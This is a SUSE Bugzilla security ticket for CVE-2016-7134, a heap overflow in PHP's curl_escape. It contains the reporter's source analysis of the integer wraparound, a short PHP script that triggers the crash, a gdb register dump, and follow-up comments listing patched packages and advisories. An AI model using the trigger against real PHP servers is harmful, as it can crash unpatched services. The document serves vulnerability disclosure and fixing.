First Last Prev Next    This bug is not in your last search results.
Bug 997248 - (CVE-2016-7134) VUL-0: CVE-2016-7134: php5, php7: Heap overflow in the function curl_escape
(CVE-2016-7134)
VUL-0: CVE-2016-7134: php5, php7: Heap overflow in the function curl_escape
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other Other
: P3 - Medium : Normal
: ---
Assigned To: Security Team bot
Security Team bot
CVSSv2:RedHat:CVE-2016-7134:4.3:(AV:N...
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2016-09-05 12:49 UTC by Victor Pereira
Modified: 2017-09-20 06:37 UTC (History)
1 user (show)

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Victor Pereira 2016-09-05 12:49:50 UTC 
Description:
------------
I have founded a code block that leads to heap overflow. As you can see at :
```
PHP_FUNCTION(curl_escape)
{
        char       *str = NULL, *res = NULL;
        size_t        str_len = 0;
        zval       *zid;
        php_curl   *ch;
        *** SNIP ***
        if ((res = curl_easy_escape(ch->cp, str, str_len))) {
                RETVAL_STRING(res);
                curl_free(res);
        } else {
                RETURN_FALSE;
        }
        *** SNIP ***
}
```
I do some analysis with curl_easy_escape in libcurl and here the source code :
```
char *curl_easy_escape(CURL *handle, const char *string, int inlength)
{
        size_t alloc = (inlength?(size_t)inlength:strlen(string))+1;
        char *ns;
        char *testing_ptr = NULL;
        
        *** SNIP ***
        
        ns = malloc(alloc);
        if(!ns)
            return NULL;

        length = alloc-1;
        while(length--) {
            in = *string;
            if (Curl_isalnum(in)) {
            /* just copy this */
                ns[strindex++]=in;
        *** SNIP ***
```
Here you see that alloc is calculated by adding inlength with one. If we pass a string with length 0xfffffff in curl_escape
and the alloc add it with 1 and the result of alloc is 0. After that, the malloc a buffer with size 0 and length = 0 - 1 = -1 = 0xfffffff
this leads to heap overflow

Test script:
---------------
<?php

ini_set('memory_limit',-1);

$ch = curl_init('http://google.com');
curl_escape($ch,str_repeat("A",0xffffffff));

?>


Actual result:
--------------
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x7ffff67ce508 (<curl_easy_escape+120>:    mov    BYTE PTR [r14+r13*1],cl)
RBX: 0x0 
RCX: 0x41 ('A')
RDX: 0x14 
RSI: 0x7ffff67a2b20 --> 0x100000000 
RDI: 0x0 
RBP: 0x7ffff67ff8ec --> 0xfffcec1cfffcec1c 
RSP: 0x7fffffffa720 --> 0x148fd80 ('A' <repeats 200 times>...)
RIP: 0x7ffff67ce508 (<curl_easy_escape+120>:    mov    BYTE PTR [r14+r13*1],cl)
R8 : 0x7fffffffa5b8 --> 0x0 
R9 : 0x7fffffffa5b4 --> 0x0 
R10: 0x14773e0 --> 0x79746974 ('tity')
R11: 0x7ffff67ce490 (<curl_easy_escape>:        push   r15)
R12: 0x0 
R13: 0x38c10 
R14: 0x14773f0 ('A' <repeats 200 times>...)
R15: 0x7ffeef038c28 ('A' <repeats 200 times>...)
EFLAGS: 0x10213 (CARRY parity ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7ffff67ce4fc <curl_easy_escape+108>:       add    rax,rbp
   0x7ffff67ce4ff <curl_easy_escape+111>:       jmp    rax
   0x7ffff67ce501 <curl_easy_escape+113>:       nop    DWORD PTR [rax+0x0]
=> 0x7ffff67ce508 <curl_easy_escape+120>:       mov    BYTE PTR [r14+r13*1],cl
   0x7ffff67ce50c <curl_easy_escape+124>:       add    r13,0x1
   0x7ffff67ce510 <curl_easy_escape+128>:       mov    rax,QWORD PTR [rsp+0x10]
   0x7ffff67ce515 <curl_easy_escape+133>:       add    r15,0x1
   0x7ffff67ce519 <curl_easy_escape+137>:       sub    rax,r15
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffa720 --> 0x148fd80 ('A' <repeats 200 times>...)
0008| 0x7fffffffa728 --> 0x7ffeef000018 ('A' <repeats 200 times>...)
0016| 0x7fffffffa730 --> 0xffffffffffffffff 
0024| 0x7fffffffa738 --> 0x7ffeef000018 ('A' <repeats 200 times>...)
0032| 0x7fffffffa740 --> 0x148fd80 ('A' <repeats 200 times>...)
0040| 0x7fffffffa748 --> 0x0 
0048| 0x7fffffffa750 --> 0x7fffffffa7e0 --> 0x7fffffffa810 --> 0x7fffffffa840 --> 0x7fffffffa880 --> 0x7fffffffa990 --> 0x7fffffffcc90 --> 0x7fffffffe010 --> 0x7fffffffe160 --> 0xa28260 (<__libc_csu_init>:        push   r15)
0056| 0x7fffffffa758 --> 0x42cb20 (<_start>:    xor    ebp,ebp)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007ffff67ce508 in curl_easy_escape () from /usr/lib/x86_64-linux-gnu/libcurl.so.4
gdb-peda$ bt
#0  0x00007ffff67ce508 in curl_easy_escape () from /usr/lib/x86_64-linux-gnu/libcurl.so.4
#1  0x00000000005ff72c in zif_curl_escape (execute_data=0x7fffef614110, return_value=0x7fffef614100)
    at /home/hoangnguyen/Data/Build/audit/php-7.0.7/ext/curl/interface.c:3571



References:

https://bugs.php.net/bug.php?id=72674
vhttps://github.com/php/php-src/commit/72dbb7f416160f490c4e9987040989a10ad431c7?w=1
Comment 2 Swamp Workflow Management 2016-09-05 22:01:50 UTC 
bugbot adjusting priority
Comment 3 Petr Gajdos 2016-09-08 13:12:05 UTC 
Packages submitted.
Comment 4 Bernhard Wiedemann 2016-09-08 14:01:56 UTC 
This is an autogenerated message for OBS integration:
This bug (997248) was mentioned in
https://build.opensuse.org/request/show/425708 13.2 / php5
Comment 6 Swamp Workflow Management 2016-09-19 17:10:46 UTC 
openSUSE-SU-2016:2337-1: An update that fixes 10 vulnerabilities is now available.

Category: security (important)
Bug References: 997206,997207,997208,997210,997211,997220,997225,997230,997248,997257
CVE References: CVE-2016-7124,CVE-2016-7125,CVE-2016-7126,CVE-2016-7127,CVE-2016-7128,CVE-2016-7129,CVE-2016-7130,CVE-2016-7131,CVE-2016-7132,CVE-2016-7134
Sources used:
openSUSE 13.2 (src):    php5-5.6.1-75.2
Comment 8 Swamp Workflow Management 2016-09-28 13:13:14 UTC 
SUSE-SU-2016:2408-1: An update that fixes 24 vulnerabilities is now available.

Category: security (important)
Bug References: 987530,987580,988032,991422,991424,991426,991427,991428,991429,991430,991433,991434,991437,997206,997207,997208,997210,997211,997220,997225,997230,997248,997257
CVE References: CVE-2014-3587,CVE-2016-3587,CVE-2016-5399,CVE-2016-6128,CVE-2016-6161,CVE-2016-6207,CVE-2016-6288,CVE-2016-6289,CVE-2016-6290,CVE-2016-6291,CVE-2016-6292,CVE-2016-6295,CVE-2016-6296,CVE-2016-6297,CVE-2016-7124,CVE-2016-7125,CVE-2016-7126,CVE-2016-7127,CVE-2016-7128,CVE-2016-7129,CVE-2016-7130,CVE-2016-7131,CVE-2016-7132,CVE-2016-7134
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP1 (src):    php5-5.5.14-73.1
SUSE Linux Enterprise Module for Web Scripting 12 (src):    php5-5.5.14-73.1
Comment 10 Swamp Workflow Management 2016-10-04 15:14:35 UTC 
openSUSE-SU-2016:2451-1: An update that fixes 24 vulnerabilities is now available.

Category: security (important)
Bug References: 987530,987580,988032,991422,991424,991426,991427,991428,991429,991430,991433,991434,991437,997206,997207,997208,997210,997211,997220,997225,997230,997248,997257
CVE References: CVE-2014-3587,CVE-2016-3587,CVE-2016-5399,CVE-2016-6128,CVE-2016-6161,CVE-2016-6207,CVE-2016-6288,CVE-2016-6289,CVE-2016-6290,CVE-2016-6291,CVE-2016-6292,CVE-2016-6295,CVE-2016-6296,CVE-2016-6297,CVE-2016-7124,CVE-2016-7125,CVE-2016-7126,CVE-2016-7127,CVE-2016-7128,CVE-2016-7129,CVE-2016-7130,CVE-2016-7131,CVE-2016-7132,CVE-2016-7134
Sources used:
openSUSE Leap 42.1 (src):    php5-5.5.14-59.1
Comment 11 Andreas Stieger 2016-10-05 15:28:45 UTC 
done
Comment 12 Swamp Workflow Management 2016-10-05 19:12:25 UTC 
SUSE-SU-2016:2460-1: An update that solves 29 vulnerabilities and has two fixes is now available.

Category: security (important)
Bug References: 1001950,987580,988032,991422,991424,991426,991427,991428,991429,991430,991434,991437,995512,997206,997207,997208,997210,997211,997220,997225,997230,997247,997248,997257,999313,999679,999680,999684,999685,999819,999820
CVE References: CVE-2016-4473,CVE-2016-5399,CVE-2016-6128,CVE-2016-6161,CVE-2016-6207,CVE-2016-6289,CVE-2016-6290,CVE-2016-6291,CVE-2016-6292,CVE-2016-6295,CVE-2016-6296,CVE-2016-6297,CVE-2016-7124,CVE-2016-7125,CVE-2016-7126,CVE-2016-7127,CVE-2016-7128,CVE-2016-7129,CVE-2016-7130,CVE-2016-7131,CVE-2016-7132,CVE-2016-7133,CVE-2016-7134,CVE-2016-7412,CVE-2016-7413,CVE-2016-7414,CVE-2016-7416,CVE-2016-7417,CVE-2016-7418
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP1 (src):    php7-7.0.7-15.1
SUSE Linux Enterprise Module for Web Scripting 12 (src):    php7-7.0.7-15.1
Comment 13 Swamp Workflow Management 2016-11-01 15:25:16 UTC 
SUSE-SU-2016:2460-2: An update that solves 29 vulnerabilities and has two fixes is now available.

Category: security (important)
Bug References: 1001950,987580,988032,991422,991424,991426,991427,991428,991429,991430,991434,991437,995512,997206,997207,997208,997210,997211,997220,997225,997230,997247,997248,997257,999313,999679,999680,999684,999685,999819,999820
CVE References: CVE-2016-4473,CVE-2016-5399,CVE-2016-6128,CVE-2016-6161,CVE-2016-6207,CVE-2016-6289,CVE-2016-6290,CVE-2016-6291,CVE-2016-6292,CVE-2016-6295,CVE-2016-6296,CVE-2016-6297,CVE-2016-7124,CVE-2016-7125,CVE-2016-7126,CVE-2016-7127,CVE-2016-7128,CVE-2016-7129,CVE-2016-7130,CVE-2016-7131,CVE-2016-7132,CVE-2016-7133,CVE-2016-7134,CVE-2016-7412,CVE-2016-7413,CVE-2016-7414,CVE-2016-7416,CVE-2016-7417,CVE-2016-7418
Sources used:
SUSE Linux Enterprise Module for Web Scripting 12 (src):    php7-7.0.7-15.1
Comment 14 Swamp Workflow Management 2017-01-30 13:27:50 UTC 
An update workflow for this issue was started.
This issue was rated as moderate.
Please submit fixed packages until 2017-02-13.
When done, reassign the bug to security-team@suse.de.
https://swamp.suse.de/webswamp/wf/63367
First Last Prev Next    This bug is not in your last search results.